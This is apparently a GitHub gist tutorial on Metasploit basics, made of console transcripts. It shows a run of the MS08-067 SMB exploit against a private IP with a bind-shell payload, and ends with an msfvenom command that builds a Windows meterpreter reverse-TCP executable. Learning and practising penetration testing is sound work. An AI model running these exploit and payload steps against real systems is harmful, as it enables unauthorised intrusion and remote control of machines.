Created
June 14, 2017 21:13
-
-
Save vijayanandrp/2df9fcf1978936c757e05b61b7d4ecfc to your computer and use it in GitHub Desktop.
Learn the basics of Metasploit Framework in 5 minutes !!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #before opening - update the framework | |
| msfupdate | |
| [*] | |
| [*] Attempting to update the Metasploit Framework... | |
| [*] | |
| [*] Checking for updates via the APT repository | |
| [*] Note: expect weekly(ish) updates using this method | |
| ..... snip ....... | |
| #Open msfconsole using the terminal | |
| msfconsole | |
| [*] Starting the Metasploit Framework console.../ | |
| MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM | |
| MMMMMMMMMMM MMMMMMMMMM | |
| MMMN$ vMMMM | |
| MMMNl MMMMM MMMMM JMMMM | |
| MMMNl MMMMMMMN NMMMMMMM JMMMM | |
| MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM | |
| MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM | |
| MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM | |
| MMMNI MMMMM MMMMMMM MMMMM jMMMM | |
| MMMNI MMMMM MMMMMMM MMMMM jMMMM | |
| MMMNI MMMNM MMMMMMM MMMMM jMMMM | |
| MMMNI WMMMM MMMMMMM MMMM# JMMMM | |
| MMMMR ?MMNM MMMMM .dMMMM | |
| MMMMNm `?MMM MMMM` dMMMMM | |
| MMMMMMN ?MM MM? NMMMMMN | |
| MMMMMMMMNe JMMMMMNMMM | |
| MMMMMMMMMMNm, eMMMMMNMMNMM | |
| MMMMNNMNMMMMMNx MMMMMMNMMNMMNM | |
| MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM | |
| http://metasploit.pro | |
| Taking notes in notepad? Have Metasploit Pro track & report | |
| your progress and findings -- learn more on http://rapid7.com/metasploit | |
| =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0:-) | |
| + -- --=[ 1387 exploits - 777 auxiliary - 222 post ] | |
| + -- --=[ 342 payloads - 37 encoders - 8 nops ] | |
| + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] | |
| msf > | |
| msf > help | |
| Core Commands | |
| ============= | |
| Command Description | |
| ------- ----------- | |
| ? Help menu | |
| back Move back from the current context | |
| banner Display an awesome metasploit banner | |
| cd Change the current working directory | |
| color Toggle color | |
| connect Communicate with a host | |
| edit Edit the current module with $VISUAL or $EDITOR | |
| exit Exit the console | |
| go_pro Launch Metasploit web GUI | |
| grep Grep the output of another command | |
| help Help menu | |
| info Displays information about one or more module | |
| irb Drop into irb scripting mode | |
| jobs Displays and manages jobs | |
| kill Kill a job | |
| load Load a framework plugin | |
| loadpath Searches for and loads modules from a path | |
| makerc Save commands entered since start to a file | |
| popm Pops the latest module off the stack and makes it active | |
| previous Sets the previously loaded module as the current module | |
| pushm Pushes the active or list of modules onto the module stack | |
| quit Exit the console | |
| reload_all Reloads all modules from all defined module paths | |
| resource Run the commands stored in a file | |
| route Route traffic through a session | |
| save Saves the active datastores | |
| search Searches module names and descriptions | |
| sessions Dump session listings and display information about sessions | |
| set Sets a variable to a value | |
| setg Sets a global variable to a value | |
| show Displays modules of a given type, or all modules | |
| sleep Do nothing for the specified number of seconds | |
| spool Write console output into a file as well the screen | |
| threads View and manipulate background threads | |
| unload Unload a framework plugin | |
| unset Unsets one or more variables | |
| unsetg Unsets one or more global variables | |
| use Selects a module by name | |
| version Show the framework and console library version numbers | |
| Database Backend Commands | |
| ========================= | |
| Command Description | |
| ------- ----------- | |
| creds List all credentials in the database | |
| db_connect Connect to an existing database | |
| db_disconnect Disconnect from the current database instance | |
| db_export Export a file containing the contents of the database | |
| db_import Import a scan result file (filetype will be auto-detected) | |
| db_nmap Executes nmap and records the output automatically | |
| db_rebuild_cache Rebuilds the database-stored module cache | |
| db_status Show the current database status | |
| hosts List all hosts in the database | |
| loot List all loot in the database | |
| notes List all notes in the database | |
| services List all services in the database | |
| vulns List all vulnerabilities in the database | |
| workspace Switch between database workspaces | |
| msf > | |
| msf > help services | |
| Usage: services [-h] [-u] [-a] [-r ] [-p ] [-s ] [-o ] [addr1 addr2 ...] | |
| -a,--add Add the services instead of searching | |
| -d,--delete Delete the services instead of searching | |
| -c Only show the given columns | |
| -h,--help Show this help information | |
| -s Search for a list of service names | |
| -p Search for a list of ports | |
| -r Only show [tcp|udp] services | |
| -u,--up Only show services which are up | |
| -o Send output to a file in csv format | |
| -R,--rhosts Set RHOSTS from the results of the search | |
| -S,--search Search string to filter by | |
| Available columns: created_at, info, name, port, proto, state, updated_at | |
| msf > | |
| msf > version | |
| Framework: 4.11.0-2014122301 | |
| Console : 4.11.0-2014122301.15168 | |
| msf > | |
| msf > | |
| msf > resource | |
| Usage: resource path1 [path2 ...] | |
| Run the commands stored in the supplied files. Resource files may also contain | |
| ruby code between tags. | |
| See also: makerc | |
| msf > | |
| msf > route | |
| Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] | |
| Route traffic destined to a given subnet through a supplied session. | |
| The default comm is Local. | |
| msf > sessions | |
| Active sessions | |
| =============== | |
| No active sessions. | |
| msf > | |
| msf > search ms08-067 | |
| Matching Modules | |
| ================ | |
| Name Disclosure Date Rank Description | |
| ---- --------------- ---- ----------- | |
| exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption | |
| msf > | |
| msf > info exploit/windows/smb/ms08_067_netapi | |
| Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption | |
| Module: exploit/windows/smb/ms08_067_netapi | |
| Platform: Windows | |
| Privileged: Yes | |
| License: Metasploit Framework License (BSD) | |
| Rank: Great | |
| Disclosed: 2008-10-28 | |
| Provided by: | |
| hdm | |
| Brett Moore | |
| frank2 | |
| jduck | |
| Available targets: | |
| Id Name | |
| -- ---- | |
| 0 Automatic Targeting | |
| 1 Windows 2000 Universal | |
| 2 Windows XP SP0/SP1 Universal | |
| 3 Windows 2003 SP0 Universal | |
| 4 Windows XP SP2 English (AlwaysOn NX) | |
| 5 Windows XP SP2 English (NX) | |
| 6 Windows XP SP3 English (AlwaysOn NX) | |
| 7 Windows XP SP3 English (NX) | |
| Basic options: | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| RHOST yes The target address | |
| RPORT 445 yes Set the SMB service port | |
| SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) | |
| Payload information: | |
| Space: 400 | |
| Avoid: 8 characters | |
| Description: | |
| This module exploits a parsing flaw in the path canonicalization | |
| code of NetAPI32.dll through the Server Service. This module is | |
| capable of bypassing NX on some operating systems and service packs. | |
| The correct target must be used to prevent the Server Service (along | |
| with a dozen others in the same process) from crashing. Windows XP | |
| targets seem to handle multiple successful exploitation events, but | |
| 2003 targets will often crash or hang on subsequent attempts. This | |
| is just the first version of this module, full support for NX bypass | |
| on 2003, along with other platforms, is still in development. | |
| References: | |
| http://cvedetails.com/cve/2008-4250/ | |
| http://www.osvdb.org/49243 | |
| http://technet.microsoft.com/en-us/security/bulletin/MS08-067 | |
| http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos | |
| msf > | |
| msf > use exploit/windows/smb/ms08_067_netapi | |
| msf exploit(ms08_067_netapi) > | |
| msf exploit(ms08_067_netapi) > | |
| msf exploit(ms08_067_netapi) > show options | |
| Module options (exploit/windows/smb/ms08_067_netapi): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| RHOST yes The target address | |
| RPORT 445 yes Set the SMB service port | |
| SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) | |
| Exploit target: | |
| Id Name | |
| -- ---- | |
| 0 Automatic Targeting | |
| msf exploit(ms08_067_netapi) > set RHOST 192.168.1.76 | |
| RHOST => 192.168.1.76 | |
| msf exploit(ms08_067_netapi) > | |
| msf exploit(ms08_067_netapi) > | |
| msf exploit(ms08_067_netapi) > show options | |
| Module options (exploit/windows/smb/ms08_067_netapi): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| RHOST 192.168.1.76 yes The target address | |
| RPORT 445 yes Set the SMB service port | |
| SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) | |
| Exploit target: | |
| Id Name | |
| -- ---- | |
| 0 Automatic Targeting | |
| msf exploit(ms08_067_netapi) > | |
| msf exploit(ms08_067_netapi) > show targets | |
| Exploit targets: | |
| Id Name | |
| -- ---- | |
| 0 Automatic Targeting | |
| 1 Windows 2000 Universal | |
| 2 Windows XP SP0/SP1 Universal | |
| 3 Windows 2003 SP0 Universal | |
| 4 Windows XP SP2 English (AlwaysOn NX) | |
| 5 Windows XP SP2 English (NX) | |
| 6 Windows XP SP3 English (AlwaysOn NX) | |
| 7 Windows XP SP3 English (NX) | |
| msf exploit(ms08_067_netapi) > show payloads | |
| Compatible Payloads | |
| =================== | |
| Name Disclosure Date Rank Description | |
| ---- --------------- ---- ----------- | |
| generic/custom normal Custom Payload | |
| generic/debug_trap normal Generic x86 Debug Trap | |
| generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline | |
| generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline | |
| generic/tight_loop normal Generic x86 Tight Loop | |
| ... snip ..... | |
| msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp | |
| payload => windows/shell/bind_tcp | |
| msf exploit(ms08_067_netapi) > | |
| msf exploit(ms08_067_netapi) > | |
| msf exploit(ms08_067_netapi) > show options | |
| Module options (exploit/windows/smb/ms08_067_netapi): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| RHOST 192.168.1.76 yes The target address | |
| RPORT 445 yes Set the SMB service port | |
| SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) | |
| Payload options (windows/shell/bind_tcp): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none) | |
| LPORT 4444 yes The listen port | |
| RHOST 192.168.1.76 no The target address | |
| Exploit target: | |
| Id Name | |
| -- ---- | |
| 0 Automatic Targeting | |
| msf exploit(ms08_067_netapi) > set LPORT 1234 | |
| LPORT => 1234 | |
| msf exploit(ms08_067_netapi) > | |
| msf exploit(ms08_067_netapi) > exploit | |
| [*] Started bind handler | |
| BOOM BOOM | |
| msf exploit(ms08_067_netapi) > | |
| msf exploit(ms08_067_netapi) > back | |
| msf > | |
| msf > | |
| msf > | |
| #Help | |
| msfvenom -h | |
| #To list all payloads | |
| msfvenom -l payloads | |
| #To list all encoders | |
| msfvenom -l encoders | |
| #To get the different formats | |
| msfvenom --help-formats | |
| #Syntax | |
| msfvenom -p [payloads] -o [options] | |
| #Example for creating .exe exploit for windows | |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=12345 -f exe > win_exploit.exe | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment